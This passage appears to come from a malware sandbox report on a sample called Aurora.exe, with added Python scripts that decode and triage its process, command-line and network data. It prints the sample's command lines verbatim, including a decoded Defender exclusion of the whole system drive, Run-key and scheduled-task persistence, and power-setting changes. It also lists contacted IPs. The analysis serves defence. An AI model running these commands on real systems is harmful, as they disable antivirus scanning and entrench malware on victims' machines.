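    return found


if __name__ == "__main__":
    tree, roots = build_tree(WRITES)
    for root in roots:
        print("\n".join(render(tree, root)))
    print("masquerading images:", *sorted(masquerades(WRITES)), sep="\n  ")
```

Running it prints a single tree rooted at Aurora.exe with two branches (the %TEMP% conhost.exe that unpacks and runs Installer.exe, and the %TEMP% svchost.exe that feeds RegSvcs.exe), and lists the two masquerading images. The same keying rule applies to any sandbox table that reports parent/child pairs by PID.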

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p146312891125116171371883110193 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

Note: the powercfg calls set the AC and DC standby and hibernate timeouts to 0 (never) and disable hibernation altogether, keeping the infected host awake and online so the implant stays resident and reachable.

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA=="

Decoded (the argument is base64 over UTF-16LE): <#Uav5qdT#> Add-MpPreference <#KH9K#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jp7VfVYW#> -Force <#7bbC91a5#>. Stripped of the random <# #> block comments, which exist only to defeat string-based signatures, this is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force: it excludes the whole user profile and the entire system drive from Windows Defender scanning, so everything the chain later drops under %LOCALAPPDATA% and C:\ProgramData goes unscanned. Add-MpPreference needs administrative rights; whether the call succeeded is not recorded in this report.

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv' -Value '"C:\Users\Admin\AppData\Local\kwweifjdskdv\kwweifjdskdv.exe"' -PropertyType 'String'

Note: "Remove -ItemProperty" (with the space) is the sample's own text. PowerShell looks for a command named Remove, fails with a command-not-found error, and carries on with New-ItemProperty after the semicolon, which is why the signature table above records the Run value as set. The value points into %LOCALAPPDATA%\kwweifjdskdv, a per-user path that needs no elevation to write.

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"
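The encoded PowerShell, the Run-key write and the two SCHTASKS lines above are the sample's entire defence-evasion and persistence setup, and they are the command lines a triager decodes first. The Python below is an added example, not tooling from the report or the sandbox: it decodes -EncodedCommand payloads (accepting the -e, -ec and -enc aliases powershell.exe understands), strips the <# ... #> junk comments padding the script, parses SCHTASKS /CREATE switches and New-ItemProperty ...\Run arguments, and flags autostart targets outside Program Files and C:\Windows. The command lines are copied from the Processes list above; the TRUSTED_DIRS tuple and the finding labels are this example's own.

```python
"""Triage the command lines in this report's behavioral2 process list: decode
-EncodedCommand payloads, strip junk block comments, and extract the autostart
entries (Run key, scheduled tasks) they create."""
import base64
import re

# Command lines copied from this report (behavioral2, Processes). Backslashes are
# doubled only because these are ordinary Python string literals.
CMDLINES = [
    'powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA=="',
    "\"powershell.exe\" Remove -ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name 'kwweifjdskdv' -Value '\"C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe\"' "
    "-PropertyType 'String'",
    'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\\ProgramData\\Dllhost\\dllhost.exe"',
    'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\\NvStrayService_bk648" /TR "C:\\ProgramData\\Dllhost\\dllhost.exe"',
]

# Autostart targets outside these roots get flagged; the tuple is this example's own choice.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)
RUN_KEY = re.compile(
    r"New-ItemProperty\s+-Path\s+'([^']*\\Run)'\s+-Name\s+'([^']+)'\s+-Value\s+'\"?([^'\"]+)\"?'", re.I)


def tokenize(cmdline):
    """Split on whitespace, keeping "quoted" arguments whole (Windows style, no escapes)."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline)]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand (or its -e / -ec / -enc
    aliases and longer prefixes), or None if the line carries none."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        flag = tok[1:].lower()
        if tok[:1] in ("-", "/") and flag and "encodedcommand".startswith(flag):
            return base64.b64decode(toks[i + 1]).decode("utf-16-le")
    return None


def normalize_ps(script):
    """Drop <# ... #> block comments (used here as junk padding) and collapse whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def parse_schtasks(cmdline):
    """Return SCHTASKS switches as a dict ({'CREATE': True, 'SC': 'MINUTE', ...}) or None."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower() not in ("schtasks", "schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(toks):
        key = toks[i].lstrip("/").upper()
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[key], i = toks[i + 1], i + 2
        else:
            opts[key], i = True, i + 1
    return opts


def outside_trusted_dirs(path):
    return not path.lower().startswith(TRUSTED_DIRS)


def triage_cmdlines(cmdlines):
    """Return (kind, detail) findings in command-line order."""
    findings = []
    for line in cmdlines:
        script = decode_encoded_command(line)
        if script is not None:
            script = normalize_ps(script)
            kind = ("defender-exclusion"
                    if re.search(r"add-mppreference.*-exclusionpath", script, re.I)
                    else "encoded-powershell")
            findings.append((kind, script))
        run = RUN_KEY.search(line)
        if run and outside_trusted_dirs(run.group(3)):
            findings.append(("run-key", f"{run.group(1)}\\{run.group(2)} -> {run.group(3)}"))
        task = parse_schtasks(line)
        target = task.get("TR") if task else None
        if task and "CREATE" in task and isinstance(target, str) and outside_trusted_dirs(target):
            cadence = task.get("SC", "?") + (f"/{task['MO']}" if "MO" in task else "")
            findings.append(("scheduled-task", f"{task.get('TN')} every {cadence} -> {target}"))
    return findings


if __name__ == "__main__":
    for kind, detail in triage_cmdlines(CMDLINES):
        print(f"{kind:18} {detail}")
```

The output is four findings: the Defender exclusion of the user profile and system drive, the HKCU Run value pointing into %LOCALAPPDATA%, and the two tasks that run C:\ProgramData\Dllhost\dllhost.exe every five minutes and hourly. The task names ("dllhost", "NvStray\NvStrayService_bk648") imitate Windows and NVIDIA components, which is why the check keys on the target path rather than the name.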

Network

Country Destination Domain Proto
NL 45.15.156.167:80 tcp
US 8.8.8.8:53 167.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
NL 195.20.16.153:80 195.20.16.153 tcp
US 8.8.8.8:53 153.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 joxi.net udp
US 172.67.162.70:80 joxi.net tcp
US 172.67.162.70:443 joxi.net tcp
US 8.8.8.8:53 70.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 94.193.125.74.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 195.20.16.153:80 195.20.16.153 tcp
NL 195.20.16.153:80 195.20.16.153 tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp
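A sandbox network table mixes the sample's own connections with the resolver's PTR lookups, so the list needs sorting before anything goes on a blocklist. The Python below is an added example, not part of the report: it maps each in-addr.arpa lookup back to the address it names, separates the raw-IP HTTP destinations (45.15.156.167 and 195.20.16.153, contacted with no hostname at all) from the named services, and lists PTR targets that never appear as a tcp destination, which point at traffic the table does not otherwise show. The rows are copied from the table above; the category names and the grouping of joxi.net with pastebin.com as public hosting are this example's assumptions.

```python
"""Sort this report's behavioral2 Network table into resolver lookups, PTR lookups
and the endpoints worth acting on."""
import ipaddress
import re

# Rows copied from the Network table above: (country, destination, domain, proto).
ROWS = [
    ("NL", "45.15.156.167:80", "", "tcp"),
    ("US", "8.8.8.8:53", "167.156.15.45.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "api.ip.sb", "udp"),
    ("US", "104.26.12.31:443", "api.ip.sb", "tcp"),
    ("US", "8.8.8.8:53", "31.12.26.104.in-addr.arpa", "udp"),
    ("NL", "195.20.16.153:80", "195.20.16.153", "tcp"),
    ("US", "8.8.8.8:53", "153.16.20.195.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "joxi.net", "udp"),
    ("US", "172.67.162.70:80", "joxi.net", "tcp"),
    ("US", "172.67.162.70:443", "joxi.net", "tcp"),
    ("US", "8.8.8.8:53", "70.162.67.172.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "194.178.17.96.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "94.193.125.74.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "pastebin.com", "udp"),
    ("US", "104.20.68.143:443", "pastebin.com", "tcp"),
    ("NL", "195.20.16.153:80", "195.20.16.153", "tcp"),
    ("NL", "195.20.16.153:80", "195.20.16.153", "tcp"),
    ("US", "8.8.8.8:53", "143.68.20.104.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "31.243.111.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "173.178.17.96.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "66.112.168.52.in-addr.arpa", "udp"),
]

# Triage labels chosen for this example, not categories the sandbox emits.
IP_CHECK_SERVICES = {"api.ip.sb"}              # public-IP lookup, a stealer's usual first call
PUBLIC_HOSTING = {"pastebin.com", "joxi.net"}  # pastebin.com is flagged by the report; joxi.net
                                               # is grouped with it as a public file host (assumption)
PTR_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa")


def ptr_target(domain):
    """Map d.c.b.a.in-addr.arpa back to the address a.b.c.d it looks up, else None."""
    m = PTR_RE.fullmatch(domain)
    return ".".join(reversed(m.groups())) if m else None


def is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def triage_network(rows):
    """Return categorised endpoints; each list is de-duplicated in first-seen order."""
    cats = {"forward_lookups": [], "ptr_targets": [], "raw_ip_http": [],
            "ip_check": [], "hosting": [], "other": []}
    tcp_hosts = set()

    def add(cat, value):
        if value not in cats[cat]:
            cats[cat].append(value)

    for _country, dest, domain, proto in rows:
        host, port = dest.rsplit(":", 1)
        if proto == "udp" and port == "53":
            target = ptr_target(domain)
            if target:
                add("ptr_targets", target)      # reverse lookup of a peer the VM talked to
            else:
                add("forward_lookups", domain)  # the name; its answer appears as a tcp row
            continue
        tcp_hosts.add(host)
        if domain in IP_CHECK_SERVICES:
            add("ip_check", f"{domain} ({dest})")
        elif domain in PUBLIC_HOSTING:
            add("hosting", f"{domain} ({dest})")
        elif not domain or is_ip(domain):
            add("raw_ip_http", dest)            # no hostname at all: hard-coded server candidate
        else:
            add("other", f"{domain} ({dest})")
    # PTR lookups whose address never appears as a tcp destination point at traffic the
    # table does not otherwise show (commonly OS background connections); keep them apart.
    cats["unmatched_ptr"] = sorted(set(cats["ptr_targets"]) - tcp_hosts)
    return cats


if __name__ == "__main__":
    for cat, values in triage_network(ROWS).items():
        print(f"{cat}: {', '.join(values) or '-'}")
```

For this table the actionable set is small: two raw-IP HTTP servers, one IP-check service and two public hosting domains. Five PTR targets (for example 96.17.178.194 and 74.125.193.94) have no matching tcp row and should be treated as unattributed until the capture shows who contacted them; the same function applies unchanged to the behavioral4 table, where both tcp destinations are raw IPs.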

Files

C:\Users\Admin\AppData\Local\Temp\conhost.exe

C:\Users\Admin\AppData\Local\Temp\main\main.bat

C:\Users\Admin\AppData\Local\Temp\main\file.bin

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2gbtavo.0qj.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
